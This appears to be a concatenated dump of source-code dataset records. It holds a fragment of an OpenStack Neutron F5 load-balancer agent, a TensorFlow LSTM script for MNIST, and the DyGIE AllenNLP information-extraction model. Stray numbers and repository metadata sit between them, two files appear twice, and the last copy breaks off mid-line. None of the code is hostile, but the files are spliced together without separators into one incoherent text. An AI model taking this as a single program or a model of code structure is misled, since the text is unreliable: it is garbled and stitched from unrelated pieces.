self.polling_interval = 10 self.iter_num = 0 self.run_daemon_loop = True self.quitting_rpc_timeout = quitting_rpc_timeout self.catch_sigterm = False self.catch_sighup = False # Stores port update notifications for processing in main rpc loop self.updated_ports = set() # Stores port delete notifications self.deleted_ports = set() self.network_ports = collections.defaultdict(set) self.local_vlan_map = {} self.f5_driver = importutils.import_object(cfg.CONF.f5_bigip_lbaas_device_driver, cfg.CONF) host = self.conf.host self.agent_host = host + ":" + self.f5_driver.agent_id self.f5_driver.agent_host = self.agent_host self.agent_id = 'f5-agent-%s' % host self.setup_rpc() self.db = db_base.NeutronDbPluginV2() self.agent_state = { 'binary': 'neutron-f5-agent', 'host': self.agent_host, 'topic': n_const.L2_AGENT_TOPIC, 'configurations': {}, 'agent_type': f5_constants.F5_AGENT_TYPE, 'start_flag': True} self.connection.consume_in_threads() def port_update(self, context, **kwargs): port = kwargs.get('port') self.updated_ports.add(port['id']) def port_delete(self, context, **kwargs): port_id = kwargs.get('port_id') self.deleted_ports.add(port_id) self.updated_ports.discard(port_id) def network_create(self, context, **kwargs): pass def network_update(self, context, **kwargs): network_id = kwargs['network']['id'] for port_id in self.network_ports[network_id]: # notifications could arrive out of order, if the port is deleted # we don't want to update it anymore if port_id not in self.deleted_ports: self.updated_ports.add(port_id) def network_delete(self, context, **kwargs): pass def _clean_network_ports(self, port_id): for port_set in self.network_ports.values(): if port_id in port_set: port_set.remove(port_id) break def setup_rpc(self): LOG.info(_LI("RPC agent_id: %s"), self.agent_id) self.plugin_rpc = agent_rpc.PluginApi(topics.PLUGIN) self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN) # RPC network init self.context = context.get_admin_context_without_session() self.context_with_session = context.get_admin_context() # Define the listening consumers for the agent consumers = [[topics.PORT, topics.CREATE], [topics.PORT, topics.UPDATE], [topics.PORT, topics.DELETE], [topics.NETWORK, topics.CREATE], [topics.NETWORK, topics.UPDATE], [topics.NETWORK, topics.DELETE]] self.connection = agent_rpc.create_consumers([self], topics.AGENT, consumers, start_listening=False) report_interval = 30 # self.conf.AGENT.report_interval heartbeat = loopingcall.FixedIntervalLoopingCall(self._report_state) heartbeat.start(interval=report_interval) def _report_state(self): LOG.info(_LI("******** Reporting state via rpc")) try: self.state_rpc.report_state(self.context, self.agent_state) self.agent_state.pop('start_flag', None) except Exception: LOG.exception(_LE("Failed reporting state!")) def _check_and_handle_signal(self): if self.catch_sigterm: LOG.info(_LI("Agent caught SIGTERM, quitting daemon loop.")) self.run_daemon_loop = False self.catch_sigterm = False if self.catch_sighup: LOG.info(_LI("Agent caught SIGHUP, resetting.")) self.conf.reload_config_files() config.setup_logging() self.conf.log_opt_values(LOG, logging.DEBUG) self.catch_sighup = False return self.run_daemon_loop def _handle_sigterm(self, signum, frame): self.catch_sigterm = True if self.quitting_rpc_timeout: self.set_rpc_timeout(self.quitting_rpc_timeout) def _handle_sighup(self, signum, frame): self.catch_sighup = True def _scan_ports(self): start = time.clock() # For now get all ports, we will then check for the corresponding VLAN config on the device # Will not scale but should prove concept works, we are also using direct DB calls rather than RPC, I suspect this # is an anti pattern and done properly we should extend the RPC API to allow us to scan the LB ports all_ports = self.db.get_ports(self.context_with_session, filters={}) for port in all_ports: LOG.info( port) LOG.info(_LI("Agent port scan for port {}".format(port['id']))) network = self.db.get_network(self.context_with_session, port['network_id']) binding_levels = db_ml2.get_binding_levels(self.context_with_session.session, port['id'], self.agent_host) for binding_level in binding_levels: LOG.info(_LI("Binding level {}".format(binding_level))) # if segment bound with ml2f5 driver if binding_level.driver == 'f5ml2': segment = db_ml2.get_segment_by_id(self.context_with_session.session, binding_level.segment_id) if segment['network_type'] == 'vlan': # and type is VLAN # Get VLANs from iControl for port network and check they are bound to the correct VLAN for bigip in self.f5_driver.get_config_bigips(): folder = 'Project_' + network['tenant_id'] name = 'vlan-' + network['id'][0:10] v = bigip.net.vlans.vlan if v.exists(name=name, partition=folder): v.load(name=name, partition=folder) tag = v.tag if tag != segment['segmentation_id']: # Update VLAN tag in case of mismatch LOG.info("Updating VLAN tag was %s needs to be %s", tag, segment['segmentation_id']) v.tag = segment['segmentation_id'] v.update() LOG.info(_LI("Scan ports completed in {} seconds".format(time.clock() - start))) def loop_count_and_wait(self, start_time, port_stats): # sleep till end of polling interval elapsed = time.time() - start_time LOG.debug("F5 Agent rpc_loop - iteration:%(iter_num)d " "completed. Processed ports statistics: " "%(port_stats)s. Elapsed:%(elapsed).3f", {'iter_num': self.iter_num, 'port_stats': port_stats, 'elapsed': elapsed}) if elapsed < self.polling_interval: time.sleep(self.polling_interval - elapsed) else: LOG.debug("Loop iteration exceeded interval " "(%(polling_interval)s vs. %(elapsed)s)!", {'polling_interval': self.polling_interval, 'elapsed': elapsed}) self.iter_num = self.iter_num + 1 def rpc_loop(self, ): while self._check_and_handle_signal(): start = time.time() port_stats = {} try: self._scan_ports() except Exception: LOG.exception(_LE("Error while processing ports")) self.loop_count_and_wait(start, port_stats) def daemon_loop(self): # Start everything. LOG.info(_LI("Agent initialized successfully, now running... ")) signal.signal(signal.SIGTERM, self._handle_sigterm) if hasattr(signal, 'SIGHUP'): signal.signal(signal.SIGHUP, self._handle_sighup) self.rpc_loop()
8,131
484
23
1a75c8a8fd2beddcfde21f65f430272b0cbb7ae4
1,732
py
Python
lstm.py
KT12/hands_on_machine_learning
6de2292b43d7c34b6509ad61dab2da4f7ec04894
[ "MIT" ]
null
null
null
lstm.py
KT12/hands_on_machine_learning
6de2292b43d7c34b6509ad61dab2da4f7ec04894
[ "MIT" ]
null
null
null
lstm.py
KT12/hands_on_machine_learning
6de2292b43d7c34b6509ad61dab2da4f7ec04894
[ "MIT" ]
null
null
null
import tensorflow as tf import numpy as np tf.set_random_seed(5) n_inputs = 28 n_neurons = 150 n_layers = 3 n_steps = 28 n_outputs = 10 learning_rate = 0.001 from tensorflow.examples.tutorials.mnist import input_data mnist = input_data.read_data_sets("/tmp/data/") X_test = mnist.test.images.reshape((-1, n_steps, n_inputs)) y_test = mnist.test.labels X = tf.placeholder(tf.float32, [None, n_steps, n_inputs]) y = tf.placeholder(tf.int32, [None]) multi_cell = tf.contrib.rnn.MultiRNNCell([tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons) for _ in range(3)]) outputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32) top_layer_h_state = states[-1][1] logits = tf.layers.dense(top_layer_h_state, n_outputs, name='softmax') x_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits) loss = tf.reduce_mean(x_entropy, name='loss') optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) training_op = optimizer.minimize(loss) correct = tf.nn.in_top_k(logits, y, 1) accuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) init = tf.global_variables_initializer() states top_layer_h_state n_epochs = 25 batch_size = 150 with tf.Session() as sess: init.run() for epoch in range(n_epochs): for k in range(mnist.train.num_examples // batch_size): X_batch, y_batch = mnist.train.next_batch(batch_size) X_batch = X_batch.reshape((batch_size, n_steps, n_inputs)) sess.run(training_op, feed_dict={X: X_batch, y: y_batch}) acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch}) acc_test = accuracy.eval(feed_dict={X: X_test, y: y_test}) print("Epoch", epoch, 'Train acc: ', acc_train, "Test acc: ", acc_test)
33.960784
111
0.732102
import tensorflow as tf import numpy as np tf.set_random_seed(5) n_inputs = 28 n_neurons = 150 n_layers = 3 n_steps = 28 n_outputs = 10 learning_rate = 0.001 from tensorflow.examples.tutorials.mnist import input_data mnist = input_data.read_data_sets("/tmp/data/") X_test = mnist.test.images.reshape((-1, n_steps, n_inputs)) y_test = mnist.test.labels X = tf.placeholder(tf.float32, [None, n_steps, n_inputs]) y = tf.placeholder(tf.int32, [None]) multi_cell = tf.contrib.rnn.MultiRNNCell([tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons) for _ in range(3)]) outputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32) top_layer_h_state = states[-1][1] logits = tf.layers.dense(top_layer_h_state, n_outputs, name='softmax') x_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits) loss = tf.reduce_mean(x_entropy, name='loss') optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) training_op = optimizer.minimize(loss) correct = tf.nn.in_top_k(logits, y, 1) accuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) init = tf.global_variables_initializer() states top_layer_h_state n_epochs = 25 batch_size = 150 with tf.Session() as sess: init.run() for epoch in range(n_epochs): for k in range(mnist.train.num_examples // batch_size): X_batch, y_batch = mnist.train.next_batch(batch_size) X_batch = X_batch.reshape((batch_size, n_steps, n_inputs)) sess.run(training_op, feed_dict={X: X_batch, y: y_batch}) acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch}) acc_test = accuracy.eval(feed_dict={X: X_test, y: y_test}) print("Epoch", epoch, 'Train acc: ', acc_train, "Test acc: ", acc_test)
0
0
0
22230bd8b1f3797e8dc3f1afa43c1e2179290ce4
19,313
py
Python
dygiepp/dygie/models/dygie.py
feiLinX/SciREX
768c869af746f4a61b3d58b15897e03caa5e2d32
[ "Apache-2.0" ]
99
2020-05-04T11:07:00.000Z
2022-03-30T12:55:00.000Z
dygiepp/dygie/models/dygie.py
feiLinX/SciREX
768c869af746f4a61b3d58b15897e03caa5e2d32
[ "Apache-2.0" ]
13
2020-08-05T18:22:44.000Z
2021-05-06T21:35:05.000Z
dygiepp/dygie/models/dygie.py
feiLinX/SciREX
768c869af746f4a61b3d58b15897e03caa5e2d32
[ "Apache-2.0" ]
24
2020-07-09T13:37:42.000Z
2022-03-26T09:56:43.000Z
from os import path import logging from typing import Dict, List, Optional import copy import torch import torch.nn.functional as F from overrides import overrides from allennlp.data import Vocabulary from allennlp.common.params import Params from allennlp.models.model import Model from allennlp.modules import Seq2SeqEncoder, TextFieldEmbedder, FeedForward from allennlp.modules.span_extractors import SelfAttentiveSpanExtractor, EndpointSpanExtractor from allennlp.nn import util, InitializerApplicator, RegularizerApplicator # Import submodules. from dygie.models.coref import CorefResolver from dygie.models.ner import NERTagger from dygie.models.relation import RelationExtractor from dygie.models.events import EventExtractor from dygie.training.joint_metrics import JointMetrics logger = logging.getLogger(__name__) # pylint: disable=invalid-name @Model.register("dygie") class DyGIE(Model): """ TODO(dwadden) document me. Parameters ---------- vocab : ``Vocabulary`` text_field_embedder : ``TextFieldEmbedder`` Used to embed the ``text`` ``TextField`` we get as input to the model. context_layer : ``Seq2SeqEncoder`` This layer incorporates contextual information for each word in the document. feature_size: ``int`` The embedding size for all the embedded features, such as distances or span widths. submodule_params: ``TODO(dwadden)`` A nested dictionary specifying parameters to be passed on to initialize submodules. max_span_width: ``int`` The maximum width of candidate spans. lexical_dropout: ``int`` The probability of dropping out dimensions of the embedded text. initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``) Used to initialize the model parameters. regularizer : ``RegularizerApplicator``, optional (default=``None``) If provided, will be used to calculate the regularization penalty during training. display_metrics: ``List[str]``. A list of the metrics that should be printed out during model training. """ @overrides def forward(self, text, spans, ner_labels, coref_labels, relation_labels, trigger_labels, argument_labels, metadata): """ TODO(dwadden) change this. """ # For co-training on Ontonotes, need to change the loss weights depending on the data coming # in. This is a hack but it will do for now. if self._co_train: if self.training: dataset = [entry["dataset"] for entry in metadata] assert len(set(dataset)) == 1 dataset = dataset[0] assert dataset in ["ace", "ontonotes"] if dataset == "ontonotes": self._loss_weights = dict(coref=1, ner=0, relation=0, events=0) else: self._loss_weights = self._permanent_loss_weights # This assumes that there won't be any co-training data in the dev and test sets, and that # coref propagation will still happen even when the coref weight is set to 0. else: self._loss_weights = self._permanent_loss_weights # In AllenNLP, AdjacencyFields are passed in as floats. This fixes it. relation_labels = relation_labels.long() argument_labels = argument_labels.long() # If we're doing Bert, get the sentence class token as part of the text embedding. This will # break if we use Bert together with other embeddings, but that won't happen much. if "bert-offsets" in text: offsets = text["bert-offsets"] sent_ix = torch.zeros(offsets.size(0), device=offsets.device, dtype=torch.long).unsqueeze(1) padded_offsets = torch.cat([sent_ix, offsets], dim=1) text["bert-offsets"] = padded_offsets padded_embeddings = self._text_field_embedder(text) cls_embeddings = padded_embeddings[:, 0, :] text_embeddings = padded_embeddings[:, 1:, :] else: text_embeddings = self._text_field_embedder(text) cls_embeddings = torch.zeros([text_embeddings.size(0), text_embeddings.size(2)], device=text_embeddings.device) text_embeddings = self._lexical_dropout(text_embeddings) # Shape: (batch_size, max_sentence_length) text_mask = util.get_text_field_mask(text).float() sentence_group_lengths = text_mask.sum(dim=1).long() sentence_lengths = 0*text_mask.sum(dim=1).long() for i in range(len(metadata)): sentence_lengths[i] = metadata[i]["end_ix"] - metadata[i]["start_ix"] for k in range(sentence_lengths[i], sentence_group_lengths[i]): text_mask[i][k] = 0 max_sentence_length = sentence_lengths.max().item() # TODO(Ulme) Speed this up by tensorizing new_text_embeddings = torch.zeros([text_embeddings.shape[0], max_sentence_length, text_embeddings.shape[2]], device=text_embeddings.device) for i in range(len(new_text_embeddings)): new_text_embeddings[i][0:metadata[i]["end_ix"] - metadata[i]["start_ix"]] = text_embeddings[i][metadata[i]["start_ix"]:metadata[i]["end_ix"]] #max_sent_len = max(sentence_lengths) #the_list = [list(k+metadata[i]["start_ix"] if k < max_sent_len else 0 for k in range(text_embeddings.shape[1])) for i in range(len(metadata))] #import ipdb; ipdb.set_trace() #text_embeddings = torch.gather(text_embeddings, 1, torch.tensor(the_list, device=text_embeddings.device).unsqueeze(2).repeat(1, 1, text_embeddings.shape[2])) text_embeddings = new_text_embeddings # Only keep the text embeddings that correspond to actual tokens. # text_embeddings = text_embeddings[:, :max_sentence_length, :].contiguous() text_mask = text_mask[:, :max_sentence_length].contiguous() # Shape: (batch_size, max_sentence_length, encoding_dim) contextualized_embeddings = self._lstm_dropout(self._context_layer(text_embeddings, text_mask)) assert spans.max() < contextualized_embeddings.shape[1] if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size) attended_span_embeddings = self._attentive_span_extractor(text_embeddings, spans) # Shape: (batch_size, num_spans) span_mask = (spans[:, :, 0] >= 0).float() # SpanFields return -1 when they are used as padding. As we do # some comparisons based on span widths when we attend over the # span representations that we generate from these indices, we # need them to be <= 0. This is only relevant in edge cases where # the number of spans we consider after the pruning stage is >= the # total number of spans, because in this case, it is possible we might # consider a masked span. # Shape: (batch_size, num_spans, 2) spans = F.relu(spans.float()).long() # Shape: (batch_size, num_spans, 2 * encoding_dim + feature_size) endpoint_span_embeddings = self._endpoint_span_extractor(contextualized_embeddings, spans) if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size + 2 * encoding_dim + feature_size) span_embeddings = torch.cat([endpoint_span_embeddings, attended_span_embeddings], -1) else: span_embeddings = endpoint_span_embeddings # TODO(Ulme) try normalizing span embeddeings #span_embeddings = span_embeddings.abs().sum(dim=-1).unsqueeze(-1) # Make calls out to the modules to get results. output_coref = {'loss': 0} output_ner = {'loss': 0} output_relation = {'loss': 0} output_events = {'loss': 0} # Prune and compute span representations for coreference module if self._loss_weights["coref"] > 0 or self._coref.coref_prop > 0: output_coref, coref_indices = self._coref.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, coref_labels, metadata) # Prune and compute span representations for relation module if self._loss_weights["relation"] > 0 or self._relation.rel_prop > 0: output_relation = self._relation.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, relation_labels, metadata) # Propagation of global information to enhance the span embeddings if self._coref.coref_prop > 0: # TODO(Ulme) Implement Coref Propagation output_coref = self._coref.coref_propagation(output_coref) span_embeddings = self._coref.update_spans(output_coref, span_embeddings, coref_indices) if self._relation.rel_prop > 0: output_relation = self._relation.relation_propagation(output_relation) span_embeddings = self.update_span_embeddings(span_embeddings, span_mask, output_relation["top_span_embeddings"], output_relation["top_span_mask"], output_relation["top_span_indices"]) # Make predictions and compute losses for each module if self._loss_weights['ner'] > 0: output_ner = self._ner( spans, span_mask, span_embeddings, sentence_lengths, ner_labels, metadata) if self._loss_weights['coref'] > 0: try : output_coref = self._coref.predict_labels(output_coref, metadata) except : output_coref = {} if self._loss_weights['relation'] > 0: output_relation = self._relation.predict_labels(relation_labels, output_relation, metadata) if self._loss_weights['events'] > 0: # Make the trigger embeddings the same size as the argument embeddings to make # propagation easier. if self._events._span_prop._n_span_prop > 0: trigger_embeddings = contextualized_embeddings.repeat(1, 1, 2) trigger_widths = torch.zeros([trigger_embeddings.size(0), trigger_embeddings.size(1)], device=trigger_embeddings.device, dtype=torch.long) trigger_width_embs = self._endpoint_span_extractor._span_width_embedding(trigger_widths) trigger_width_embs = trigger_width_embs.detach() trigger_embeddings = torch.cat([trigger_embeddings, trigger_width_embs], dim=-1) else: trigger_embeddings = contextualized_embeddings output_events = self._events( text_mask, trigger_embeddings, spans, span_mask, span_embeddings, cls_embeddings, sentence_lengths, output_ner, trigger_labels, argument_labels, ner_labels, metadata) if "loss" not in output_coref: output_coref["loss"] = 0 if "loss" not in output_relation: output_relation["loss"] = 0 # TODO(dwadden) just did this part. loss = (self._loss_weights['coref'] * output_coref['loss'] + self._loss_weights['ner'] * output_ner['loss'] + self._loss_weights['relation'] * output_relation['loss'] + self._loss_weights['events'] * output_events['loss']) output_dict = dict(coref=output_coref, relation=output_relation, ner=output_ner, events=output_events) output_dict['loss'] = loss # Check to see if event predictions are globally compatible (argument labels are compatible # with NER tags and trigger tags). # if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: # decoded_ner = self._ner.decode(output_dict["ner"]) # decoded_events = self._events.decode(output_dict["events"]) # self._joint_metrics(decoded_ner, decoded_events) return output_dict @overrides def decode(self, output_dict: Dict[str, torch.Tensor]): """ Converts the list of spans and predicted antecedent indices into clusters of spans for each element in the batch. Parameters ---------- output_dict : ``Dict[str, torch.Tensor]``, required. The result of calling :func:`forward` on an instance or batch of instances. Returns ------- The same output dictionary, but with an additional ``clusters`` key: clusters : ``List[List[List[Tuple[int, int]]]]`` A nested list, representing, for each instance in the batch, the list of clusters, which are in turn comprised of a list of (start, end) inclusive spans into the original document. """ # TODO(dwadden) which things are already decoded? res = {} if self._loss_weights["coref"] > 0: try : res["coref"] = self._coref.decode(output_dict["coref"]) except : pass if self._loss_weights["ner"] > 0: res["ner"] = self._ner.decode(output_dict["ner"]) if self._loss_weights["relation"] > 0: res["relation"] = self._relation.decode(output_dict["relation"]) if self._loss_weights["events"] > 0: res["events"] = output_dict["events"] return res def get_metrics(self, reset: bool = False) -> Dict[str, float]: """ Get all metrics from all modules. For the ones that shouldn't be displayed, prefix their keys with an underscore. """ metrics_coref = self._coref.get_metrics(reset=reset) metrics_ner = self._ner.get_metrics(reset=reset) metrics_relation = self._relation.get_metrics(reset=reset) metrics_events = self._events.get_metrics(reset=reset) if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: metrics_joint = self._joint_metrics.get_metric(reset=reset) else: metrics_joint = {} # Make sure that there aren't any conflicting names. metric_names = (list(metrics_coref.keys()) + list(metrics_ner.keys()) + list(metrics_relation.keys()) + list(metrics_events.keys())) assert len(set(metric_names)) == len(metric_names) all_metrics = dict(list(metrics_coref.items()) + list(metrics_ner.items()) + list(metrics_relation.items()) + list(metrics_events.items()) + list(metrics_joint.items())) # If no list of desired metrics given, display them all. if self._display_metrics is None: return all_metrics # Otherwise only display the selected ones. res = {} for k, v in all_metrics.items(): if k in self._display_metrics: res[k] = v else: new_k = "_" + k res[new_k] = v return res
47.68642
166
0.622741
from os import path import logging from typing import Dict, List, Optional import copy import torch import torch.nn.functional as F from overrides import overrides from allennlp.data import Vocabulary from allennlp.common.params import Params from allennlp.models.model import Model from allennlp.modules import Seq2SeqEncoder, TextFieldEmbedder, FeedForward from allennlp.modules.span_extractors import SelfAttentiveSpanExtractor, EndpointSpanExtractor from allennlp.nn import util, InitializerApplicator, RegularizerApplicator # Import submodules. from dygie.models.coref import CorefResolver from dygie.models.ner import NERTagger from dygie.models.relation import RelationExtractor from dygie.models.events import EventExtractor from dygie.training.joint_metrics import JointMetrics logger = logging.getLogger(__name__) # pylint: disable=invalid-name @Model.register("dygie") class DyGIE(Model): """ TODO(dwadden) document me. Parameters ---------- vocab : ``Vocabulary`` text_field_embedder : ``TextFieldEmbedder`` Used to embed the ``text`` ``TextField`` we get as input to the model. context_layer : ``Seq2SeqEncoder`` This layer incorporates contextual information for each word in the document. feature_size: ``int`` The embedding size for all the embedded features, such as distances or span widths. submodule_params: ``TODO(dwadden)`` A nested dictionary specifying parameters to be passed on to initialize submodules. max_span_width: ``int`` The maximum width of candidate spans. lexical_dropout: ``int`` The probability of dropping out dimensions of the embedded text. initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``) Used to initialize the model parameters. regularizer : ``RegularizerApplicator``, optional (default=``None``) If provided, will be used to calculate the regularization penalty during training. display_metrics: ``List[str]``. A list of the metrics that should be printed out during model training. """ def __init__(self, vocab: Vocabulary, text_field_embedder: TextFieldEmbedder, context_layer: Seq2SeqEncoder, modules, # TODO(dwadden) Add type. feature_size: int, max_span_width: int, loss_weights: Dict[str, int], lexical_dropout: float = 0.2, lstm_dropout: float = 0.4, use_attentive_span_extractor: bool = False, co_train: bool = False, initializer: InitializerApplicator = InitializerApplicator(), regularizer: Optional[RegularizerApplicator] = None, display_metrics: List[str] = None) -> None: super(DyGIE, self).__init__(vocab, regularizer) self._text_field_embedder = text_field_embedder self._context_layer = context_layer self._loss_weights = loss_weights self._permanent_loss_weights = copy.deepcopy(self._loss_weights) # Need to add this line so things don't break. TODO(dwadden) sort out what's happening. modules = Params(modules) self._coref = CorefResolver.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("coref")) self._ner = NERTagger.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("ner")) self._relation = RelationExtractor.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("relation")) self._events = EventExtractor.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("events")) # Make endpoint span extractor. self._endpoint_span_extractor = EndpointSpanExtractor(context_layer.get_output_dim(), combination="x,y", num_width_embeddings=max_span_width, span_width_embedding_dim=feature_size, bucket_widths=False) if use_attentive_span_extractor: self._attentive_span_extractor = SelfAttentiveSpanExtractor( input_dim=text_field_embedder.get_output_dim()) else: self._attentive_span_extractor = None self._max_span_width = max_span_width self._display_metrics = display_metrics if lexical_dropout > 0: self._lexical_dropout = torch.nn.Dropout(p=lexical_dropout) else: self._lexical_dropout = lambda x: x # Do co-training if we're training on ACE and ontonotes. self._co_train = co_train # Big gotcha: PyTorch doesn't add dropout to the LSTM's output layer. We need to do this # manually. if lstm_dropout > 0: self._lstm_dropout = torch.nn.Dropout(p=lstm_dropout) else: self._lstm_dropout = lambda x: x initializer(self) @overrides def forward(self, text, spans, ner_labels, coref_labels, relation_labels, trigger_labels, argument_labels, metadata): """ TODO(dwadden) change this. """ # For co-training on Ontonotes, need to change the loss weights depending on the data coming # in. This is a hack but it will do for now. if self._co_train: if self.training: dataset = [entry["dataset"] for entry in metadata] assert len(set(dataset)) == 1 dataset = dataset[0] assert dataset in ["ace", "ontonotes"] if dataset == "ontonotes": self._loss_weights = dict(coref=1, ner=0, relation=0, events=0) else: self._loss_weights = self._permanent_loss_weights # This assumes that there won't be any co-training data in the dev and test sets, and that # coref propagation will still happen even when the coref weight is set to 0. else: self._loss_weights = self._permanent_loss_weights # In AllenNLP, AdjacencyFields are passed in as floats. This fixes it. relation_labels = relation_labels.long() argument_labels = argument_labels.long() # If we're doing Bert, get the sentence class token as part of the text embedding. This will # break if we use Bert together with other embeddings, but that won't happen much. if "bert-offsets" in text: offsets = text["bert-offsets"] sent_ix = torch.zeros(offsets.size(0), device=offsets.device, dtype=torch.long).unsqueeze(1) padded_offsets = torch.cat([sent_ix, offsets], dim=1) text["bert-offsets"] = padded_offsets padded_embeddings = self._text_field_embedder(text) cls_embeddings = padded_embeddings[:, 0, :] text_embeddings = padded_embeddings[:, 1:, :] else: text_embeddings = self._text_field_embedder(text) cls_embeddings = torch.zeros([text_embeddings.size(0), text_embeddings.size(2)], device=text_embeddings.device) text_embeddings = self._lexical_dropout(text_embeddings) # Shape: (batch_size, max_sentence_length) text_mask = util.get_text_field_mask(text).float() sentence_group_lengths = text_mask.sum(dim=1).long() sentence_lengths = 0*text_mask.sum(dim=1).long() for i in range(len(metadata)): sentence_lengths[i] = metadata[i]["end_ix"] - metadata[i]["start_ix"] for k in range(sentence_lengths[i], sentence_group_lengths[i]): text_mask[i][k] = 0 max_sentence_length = sentence_lengths.max().item() # TODO(Ulme) Speed this up by tensorizing new_text_embeddings = torch.zeros([text_embeddings.shape[0], max_sentence_length, text_embeddings.shape[2]], device=text_embeddings.device) for i in range(len(new_text_embeddings)): new_text_embeddings[i][0:metadata[i]["end_ix"] - metadata[i]["start_ix"]] = text_embeddings[i][metadata[i]["start_ix"]:metadata[i]["end_ix"]] #max_sent_len = max(sentence_lengths) #the_list = [list(k+metadata[i]["start_ix"] if k < max_sent_len else 0 for k in range(text_embeddings.shape[1])) for i in range(len(metadata))] #import ipdb; ipdb.set_trace() #text_embeddings = torch.gather(text_embeddings, 1, torch.tensor(the_list, device=text_embeddings.device).unsqueeze(2).repeat(1, 1, text_embeddings.shape[2])) text_embeddings = new_text_embeddings # Only keep the text embeddings that correspond to actual tokens. # text_embeddings = text_embeddings[:, :max_sentence_length, :].contiguous() text_mask = text_mask[:, :max_sentence_length].contiguous() # Shape: (batch_size, max_sentence_length, encoding_dim) contextualized_embeddings = self._lstm_dropout(self._context_layer(text_embeddings, text_mask)) assert spans.max() < contextualized_embeddings.shape[1] if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size) attended_span_embeddings = self._attentive_span_extractor(text_embeddings, spans) # Shape: (batch_size, num_spans) span_mask = (spans[:, :, 0] >= 0).float() # SpanFields return -1 when they are used as padding. As we do # some comparisons based on span widths when we attend over the # span representations that we generate from these indices, we # need them to be <= 0. This is only relevant in edge cases where # the number of spans we consider after the pruning stage is >= the # total number of spans, because in this case, it is possible we might # consider a masked span. # Shape: (batch_size, num_spans, 2) spans = F.relu(spans.float()).long() # Shape: (batch_size, num_spans, 2 * encoding_dim + feature_size) endpoint_span_embeddings = self._endpoint_span_extractor(contextualized_embeddings, spans) if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size + 2 * encoding_dim + feature_size) span_embeddings = torch.cat([endpoint_span_embeddings, attended_span_embeddings], -1) else: span_embeddings = endpoint_span_embeddings # TODO(Ulme) try normalizing span embeddeings #span_embeddings = span_embeddings.abs().sum(dim=-1).unsqueeze(-1) # Make calls out to the modules to get results. output_coref = {'loss': 0} output_ner = {'loss': 0} output_relation = {'loss': 0} output_events = {'loss': 0} # Prune and compute span representations for coreference module if self._loss_weights["coref"] > 0 or self._coref.coref_prop > 0: output_coref, coref_indices = self._coref.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, coref_labels, metadata) # Prune and compute span representations for relation module if self._loss_weights["relation"] > 0 or self._relation.rel_prop > 0: output_relation = self._relation.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, relation_labels, metadata) # Propagation of global information to enhance the span embeddings if self._coref.coref_prop > 0: # TODO(Ulme) Implement Coref Propagation output_coref = self._coref.coref_propagation(output_coref) span_embeddings = self._coref.update_spans(output_coref, span_embeddings, coref_indices) if self._relation.rel_prop > 0: output_relation = self._relation.relation_propagation(output_relation) span_embeddings = self.update_span_embeddings(span_embeddings, span_mask, output_relation["top_span_embeddings"], output_relation["top_span_mask"], output_relation["top_span_indices"]) # Make predictions and compute losses for each module if self._loss_weights['ner'] > 0: output_ner = self._ner( spans, span_mask, span_embeddings, sentence_lengths, ner_labels, metadata) if self._loss_weights['coref'] > 0: try : output_coref = self._coref.predict_labels(output_coref, metadata) except : output_coref = {} if self._loss_weights['relation'] > 0: output_relation = self._relation.predict_labels(relation_labels, output_relation, metadata) if self._loss_weights['events'] > 0: # Make the trigger embeddings the same size as the argument embeddings to make # propagation easier. if self._events._span_prop._n_span_prop > 0: trigger_embeddings = contextualized_embeddings.repeat(1, 1, 2) trigger_widths = torch.zeros([trigger_embeddings.size(0), trigger_embeddings.size(1)], device=trigger_embeddings.device, dtype=torch.long) trigger_width_embs = self._endpoint_span_extractor._span_width_embedding(trigger_widths) trigger_width_embs = trigger_width_embs.detach() trigger_embeddings = torch.cat([trigger_embeddings, trigger_width_embs], dim=-1) else: trigger_embeddings = contextualized_embeddings output_events = self._events( text_mask, trigger_embeddings, spans, span_mask, span_embeddings, cls_embeddings, sentence_lengths, output_ner, trigger_labels, argument_labels, ner_labels, metadata) if "loss" not in output_coref: output_coref["loss"] = 0 if "loss" not in output_relation: output_relation["loss"] = 0 # TODO(dwadden) just did this part. loss = (self._loss_weights['coref'] * output_coref['loss'] + self._loss_weights['ner'] * output_ner['loss'] + self._loss_weights['relation'] * output_relation['loss'] + self._loss_weights['events'] * output_events['loss']) output_dict = dict(coref=output_coref, relation=output_relation, ner=output_ner, events=output_events) output_dict['loss'] = loss # Check to see if event predictions are globally compatible (argument labels are compatible # with NER tags and trigger tags). # if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: # decoded_ner = self._ner.decode(output_dict["ner"]) # decoded_events = self._events.decode(output_dict["events"]) # self._joint_metrics(decoded_ner, decoded_events) return output_dict def update_span_embeddings(self, span_embeddings, span_mask, top_span_embeddings, top_span_mask, top_span_indices): # TODO(Ulme) Speed this up by tensorizing new_span_embeddings = span_embeddings.clone() for sample_nr in range(len(top_span_mask)): for top_span_nr, span_nr in enumerate(top_span_indices[sample_nr]): if top_span_mask[sample_nr, top_span_nr] == 0 or 